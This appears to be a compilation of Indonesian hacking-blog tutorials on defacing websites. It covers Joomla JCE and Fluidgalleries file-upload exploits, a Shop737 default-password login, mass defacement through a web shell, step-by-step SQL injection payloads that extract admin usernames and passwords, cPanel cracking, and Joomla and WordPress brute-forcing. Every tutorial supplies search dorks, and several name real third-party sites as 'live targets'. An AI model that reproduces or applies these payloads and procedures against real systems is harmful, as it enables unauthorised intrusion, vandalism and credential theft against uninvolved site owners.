Cara Mudah Deface Website Dengan Exploit Joomla JCE Extension | Remote File Upload Vulnerability

Assalamualaikum...

Salam sejahtera buat kita semua :)

Oke sobat, sebenarnya udah lama sih mau share teknik ini,  cuma saya males aja mau nyari targetnya,, wkwkwk soalnya saya jarang nemu target yg Vuln, jadi males dah,, tapi berkat bantuan dari temen saya yaitu om Agam yang dengan sukarela memberikan live target yang bisa sobat gunakan :D jadi mempermudah saya untuk berbagi teknik ini buat sobat2 semua :) Thanks to Om  Agam dan perlu sobat ketahui bahwa pada CMS joomla itu yang paling banyak ditemukan bugsnya itu di component atau Extensinya, rata2 pasti begitu :)


Udah ah ngomel2nya, langsung saja kita praktekkan :)

Bahan-Bahan :

JCE Exploiter | Download

JCE Exploiter PHP | Download

Dork :  

inurl:index.php?option=com_jce site:.br

Live Target :  

http://www.spiderdevelopments.com.au/

http://www.libira.co.il/

Udah disiapin kan bahan2nya? lanjut yuk masak2nya? Hajiahh :3

Pertama so pasti sobat harus mencari targetnya dulu di Google dengan menggunakan dork diatas :) kalo saya udah nemu tuh :D

Lalu Extrack dulu file JCE Exploiternya :)

Buka deh JCE Exploiternya :) dan Selanjutnya masukan Targetnya, lalu klik Start

Nah tuh, udah berhasil :)

Setelah berhasil exploitasinya lalu eksekusi link tersebut :)

Nah, upload aja shell sobat :)
Catatan: "kalo ga bisa upload file .php coba aja upload file .html / .txt :)

Kalo upload shellnya berhasil, tinggal eksekusi shell, trus Tebas dah :D

Cara Kedua

Upload dulu JCE Exploit PHP di  Hostingan atau apapun dah :) kalo ga mau repot, sobat bisa make punya saya aja Disini

Lalu masukkan targetnya :

Hostname : Web Target [tanpa http:// dan / ]
Path : / atau /path/
Please Specify a file to upload : Shell sobat :)

Yang lain, kosongin aja :) lalu klik Start

Nah tuh udah keliatan hasilnya :)

Langsung dah, eksekusi shellnya dan upload file depesan sobat :)

Sekian Tutorialnya, mudah2an bermanfaat buat pembelajaran :)

Kalo ada pertanyaan silahkan tinggalkan komentar atau langsung tanya di grup aja :) Terimakasih :)

Content Creator : Onix AQua

Teknik Deface Exploit Fluidgalleries File Upload ( Tamper Data )

Assalamualaikum sobat IDCA :D

Udah lama neh ngak kasih tutorial baru, sebenernya sih sekarang amsih UKK ane maklum ane masih bocah ^_^ tapi boat sobat IDCA tak apalah ngak usah belajar mending bikin artikel kwkwkwkw

oke langsung aja yah ngak usah kelamaan basa basinya takutnya jadi basi XD

Kali ini saya akan memberikan tutorial " Deface dengan Exploit "Fluidgalleries" yang saya ketahui dari temen saya si The Jackerz & Cimy .

[+] LANGKAH LANGKAH [+]

• Dork : inurl:/fluidgalleries/photos/
• Bahan : Shell yang sudah direname menjadi shell.php.jpg

Dork kembangin sendiri OK ;)

1. Copas dork diatas ke mesin pencarian, lalu pilih salah satu target

2. Setelah memilih salah satu website gunakan exploit

• localhost/[path]/fluidgalleries/php/photo-upload.php

~> Target saya : http://www.antarhanif.com/Stills/fluidgalleries/php/photo-upload.php

Setelah itu buka tools " Tamper Data " kalian, lalu klik start tamper 

3. Setelah itu, pilih file yang akan kalian upload ( shell.php.jpg )

4. Lalu klik OK, saat keluar pop up tools tamper data kalian klik " tamper "

5.  Setelah itu akan keluar Pop Up lagi dan perhatikan di sebelah kanan ada kotak kecil, carilah kata  shell.php.jpg lalu ganti dengan shell.php 

6. Jika sudah di renam lalu klik OK, tunggu sampai proses upload selesai jika sudah klik stop tamper

7. Untuk melihat shell kalian terupload atau belum pergi ke :

• localhost/[path]fluidgalleries/photos/

inget nanti bakalan ada embel embel di nama shell kalian, jadi setelah akses localhost/[path]/fluidgalleries/photos/ kalian ketik CTRL + F lalu tulis nama shll kalian ;)

Upload sukses ^_^

8. Tinggal tebas deh websitenya :D

sekian tutorial yang dapat saya berikan, jika ada yang kurang jelas silahkan tanyakan di kolom komentar ^_^

NB : Jika tidak bisa upload Php upload aja html :D

Thanks to : The Jackerz & Cimy

Deface Dengan Upload File On Shop737

Selamat siang sobat IDCA :D

hehe, sebelumnya itu judulnya bener ngak yaa >.< karena saya ngak bisa bahasa inggris sih jadi mohon maaf jika salah hehe, oke langsung aja kali ini saya mau kasih tau trik deface kayaknya sih udah cukup lama dishare, tapi karena ngak ada kerjaan yaah utek utek blog lagi deh :D

[+] TUTORIAL [+]

1. Cari target dengan dork :

• intext:"Powered by Shop737" (klik)

dork bisa dikembangin sendiri OK :)

2. Setelah itu ilih salah satu website yang ada di google tadi 

• saya pilih http://balimalio.com/poto/

3. Setelah kalian memilih targetnya, lalu masukan Exploit berikut :

• localhost/poto/upload.php , contoh => http://balimalio.com/poto/upload.php

4. Jika disuruh memasukan user + pass , silahkan isi :

• user : admin
• pass : admin

5. Setelah berhasil masuk tampilan akan seperti dibawah ini, jika gagal cari web lain :P

#Catatan :

No 1 : upload file txt/image (*ngak bisa php/html)

No 2 : pilih di Kategori mana file kalian di upload

No 3 : Klik Upload

6. Jika sudah keluar tulisan succes, buka hasil uploadan kalian di :

• localhost/poto/[Kategori]/file.txt ~> http://balimalio.com/poto/Sabun/garuda.txt

Contoh punya saya :

Sekian tutorial "Deface Dengan Upload File On Shop737" , jika ada yang kurang jelas silahkan tanyakan di kotak komentar :)

Content Creator : Bimo Septiawan

Mass Deface Website

Assaamualaikum sobat IDCA, mumpung ane udah selesai UKK neh mau share trik jadul sih hahaha, tapi daripada ngak share :D

Oke langsung aja, ini bukan mass deface server loh :P tapi cuma mass deface website yang ada di direktori aja :D

Oke langsung aja ikutin langkah berikut ini :

Bahan :

• Mass Deface ( udah ada di shell X Inject / IDCA / etc )
• Website yang direktorinya ada domain/web lain.

1. Perhatikan gambar dibawah ini, jika terdapat alamat website lain di dalam gambar yang saya lingkarin itu tandanya bisa di mass deface ^0^

2. Setelah itu pergi ke direktori dimana terdapat website didalamnya 

• contoh :  / home / awbtrad / public_html / www.maho.com , jadi /home/awbtrad/public_html

3. Tuh banyak kan websitenya ? sekarang kita klik " Mass Deface "

4. Keterangan :

Folder : udah biarin aja (kan kita udah di direktorinya)

File Name : nama file yang mau dibikin

Kolom Index Code : Isi dengan script deface kalian ^_^

Setelah itu klik HAJAR !!! 

Dah cuma gitu aja om ^_^ tinggal submit atau show offin deh :P

Selamat mencoba :D

Content Created By : Bimo Septiawan

Cara Hacking Website Dengan Teknik SQL Injection

Pengertian SQL Injection, SQL Injection adalah sebuah aksi hacking yang dilakukan diaplikasi client dengan cara memodifikasi perintah SQL yang ada dimemori aplikasi client dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu diketahui sebelum melakukan SQL Injection pada MySQL:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: MySQL versi 5.x , tidak support untuk MySQL versi 4.x

[ Step 1 ]

• Carilah target
  Misal: [site]/berita.php?id=100
  
  Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
  contoh:
  [site]/berita.php?id=100' atau
  [site]/berita.php?id=-100
  Sehingga muncul pesan error seperti berikut [ masih banyak lagi ]

[ Step 2 ]

• Mencari dan menghitung jumlah table yang ada dalam databasenya...
  gunakan perintah: order by
  
  Contoh:
  
  [site]/berita.php?id=-100+order+by+1-- atau
  [site]/berita.php?id=-100+order+by+1/*
  
  Ceklah secara step by step (satupersatu)...
  Misal:
  
  [site]/berita.php?id=-100+order+by+1--
  [site]/berita.php?id=-100+order+by+2--
  [site]/berita.php?id=-100+order+by+3--
  [site]/berita.php?id=-100+order+by+4--
  
  Sehingga muncul error atau hilang pesan error...
  Misal: [site]/berita.php?id=-100+order+by+9--
  
  Berarti yang kita ambil adalah sampai angka 8
  Menjadi [site]/berita.php?id=-100+order+by+8--

[ Step 3 ]

• untuk mengeluarkan angka berapa yang muncul gunakan perintah union
  karena tadi error sampai angka 9
  maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--
  
  ok seumpama yg keluar angka 5
  
  gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
  misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
  [site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--
  
  Lihat versi yang digunakan se'umpama versi 4 tinggalkan saja karena dalam versi 4 ini kita harus menebak sendiri table dan column yang ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..
  
  Untuk versi 5 berarti anda beruntung tak perlu menebak table dan column seperti versi 4 karena di versi 5 ini bisa menggunakan perintah From+Information_schema..

[ Step 4 ]

• Untuk menampilkan table yang ada pada web tersebut adalah
  perintah table_name >>> dimasukan pada angka yangg keluar tadi
  perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir
  
  Code:
  
  [site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--
  
  Se'umpama table yang muncul adalah "admin"

[ Step 5 ]

• untuk menampilkan semua isi dari table tersebut adalah
  perintah group_concat(table_name) >>> dimasukan pada angka yang keluar tadi
  perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir
  
  [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema. ?tables+where+table_schema=database()--

[ Step 6 ]

• Perintah group_concat(column_name) >>> dimasukan pada angka yang keluar tadi
  perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir
  
  [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ?.columns+where+table_name=0xhexa--
  
  Pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
  Website yg digunakan untuk konversi :
  
  http://www.v3n0m.net/ascii.htm
  
  Contoh kata yang ingin dikonversi yaitu admin maka akan menjadi 61646D696E
  
  [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ?.columns+where+table_name=0x61646D696E--

[ Step 7 ]

• Memunculkan apa yang tadi telah dikeluarkan dari table yaitu dengan cara
  
  perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
  perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir
  
  Contoh :
  
  [site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--
  
  Contoh kata yang keluar adalah id,username,password
  
  Contoh :
  
  [site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--

[ Step 8 ]

• Tahap terakhir mencari halaman admin atau login.

Sekian postingan saya kali ini tentang Cara Hacking Website Dengan Teknik SQL Injection, tutorial hacking yang lain akan menyusul, Jadi mampir terus kesini ya :D

Source: Hacker Newbie

Cara Terbaru Crack Cpanel 2013

Nah, Saat ini udah banyak yg tau kan bagamana nanem shell di website? :D kalo belum tau, belajar lagi sono, :D soalnya kalo kagak bisa tanem shell bijimane mau crack cpanel :) oke dah, kali ini saya menulis artikel mengenai cara crack cpanel menggunakan Shell 1n73ction v.32 . Thankz to om X'Inject :D

Yup, Rata2 di blogg2 udah banyak yg share ni, makanya kita ga mau ketinggalan juga nih :D perlu diketahui, tutorial ini sedikit berbeda dengan tutorial kami sebelumnya, kalo belum tau silahkan baca lagi Cara Crack Cpanel, langsung dah meluncur :)

Sediakan bahan2nya dolo :D kayak mau masak aja :D

1. Shell 1n73ction v.32 | Download |

Pass File : http://indocyberarmy.blogspot.com
Pass Shell : 1n73ction

2. Web Shelled

3. Web Config

Yuk mari kita lanjutkan ke langkah langkahnya :D

Pertama tentunya kita harus punya web yg sudah ditanem shell :D

Kemudian disini saya juga udah punya Web Confignya :P kalo belum tau gimana nyari config, Lihat aja artikel Cara Mencari Config :p

Lalu pada Shell 1n73ction, klik Cpanel Bruteforce

Nah, ntar muncul dah toolsnya :)

Setelah itu, masukkan url yang berisikan config web di kolom Url Config, Liat gambar dibawah :)

Klik GO dan tunggu aja sampai selesai :)

Nah, kalo udah selesai, disitu ada kumpulan wordlist2 yang akan kita gunakan sebagai wordlist password, copy aja dan masukkan di kolom Pass.

Lalu klik Start dan tunggu dah sampe selesai :)

Tuh, udah dapet :) langsung dah loggin ke cpanelnya :)

Sekian Tutorial ane mudah2an bermanfaat,, thanks udah mampir :) jangan lupa komentarnya -_- :D

Teknik Cara Deface dengan Joomla Bruteforce.Full

Assalamualaikum...

Hai sobat, udah pada tau belum tentang bruteforce? :o kalo belum silahkan tanya karo mbah google, aku yo males arek tekok2 karo mbahku :3 hahaha... yo wes lah.. :p

Pada postingan sebelumnya saya sudah membahas mengenai brutefoce, tapi sekarang kasusnya berbeda. kalo sebelumnya bruteforce untuk CMS Wordpress, nah yang ini khusus untuk CMS Joomla :D

Toolsnya sendiri ini dibuat oleh om saya, tapi ga tau omnya yang mana :( cuma tau nicknya aja :D yah siapa yg kagak kenal sama om Hmei7 :D entahlah saya juga ga kenal, yang saya kenal cuma om Hiddenymei12,, wkwkwkwk :D v thanks to om Hmei7, ijin pinjem toolsnya :D (*biar ga kena kritik :D )

Lanjuut dah, sebelum coba2 siapin dulu bahan2nya:

1. Dork: inurl:"/templates/beez5/" intitle:Index of /administrator/

2. Brute v.2 | Download

3. Live Target : www.live-target.pusku.com/joomla/

Lanjut lagi, :)

Yah seperti biasa, kalo mau nyari target silahkan gunakan dork, kembangin dorknya biar lebih maknyoos :D

Nah, kalo sudah nemu banyak targetnya silahkan kumpulkan dan simpan dalam file listsite.txt, disini ane cuma satu aja, sekedar buat coba2 apakah toolsnya masih bekerja atau tidak. :p ya begitulah :p dan kalo list passwordnya mo dibanyakin juga boleh :p

Selanjutnya kita jalankan Toolnya, lalu klik Load File, pilih file yg berisi web target sobat! lalu klik open! dan  klik Scan...

Tinggal nunggu hasilnya  :) yang sabar yah :p

Kalo udah nemu password yang cocok, tinggal login dah!

Nah ternyata toolnya masih bekerja dengan baik :)

Kalo sobat mau coba silahkan saja :) tapi saya ga yakin bisa nemu web yang password mudah ditebak, :D yah apa salahnya dicoba :v kalo ga dicoba siapa yang tau :v usaha dunk jangan cuma enaknya doank, wkwkwk :D

Sekian tutorial ini, mudah2an bermafaat dan bisa menambah pengetahuan sobat semua :)

Content Creator: Onix AQua Menyapa ^_^

Cara Mudah Deface Wordpress Site Dengan WP Bruteforce

Salam Sobat,, ;)


Hajiahh,, dini hari kagak ngapa2in neh, ga bisa tidur :3 tapi ga apa apa dah, setidaknya bisa membuat Tutorial yang berguna buat sobat semua ^_^ langsung dah disimak yooo.. ;)

Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Pertama Download Bahan-Bahannya:

WPBruteforce


Password: http://indocyberarmy.blogspot.com

Dork: inurl:/wp-login.php

Yup, saatnya kita beraksi.. :)

Live Target: http://live-target.pusku.com/

Pertama, Extract File yg didownload tadi di Directori C: sehingga posisi menajdi C:\WPBrute

Lalu buka comand dengan cara : Klik Start>Run>ketik cmd

Biasanya posisi default directories di Cmd : C:\User\User_Name>

Ubah posisi directori dgn cara: ketik cd.. trus enter!

ex:
C:\User\User_Name>cd..
C:\User>cd..
C:\>

 Lalu  setelah itu masukkan perintah C:\>cd WPBrute lalu tekan enter! 

Buka file dengan mengetik perintah: WPBorce.exe maka Akan muncul tampilan seperti gambar!

Lalu masukkan perintah: WPBforce.exe -url=http://www.tvbba.nl -user=admin -pass=wordlist.txt -threads=10

Lalu tekan enter!

Tunggu proses hingga selesai!

Wew! Berhasil tuh! wkwkwk Mantap! :p

Langsung Login dah!

GoodLuck!! :D

Content Created By Onix AQua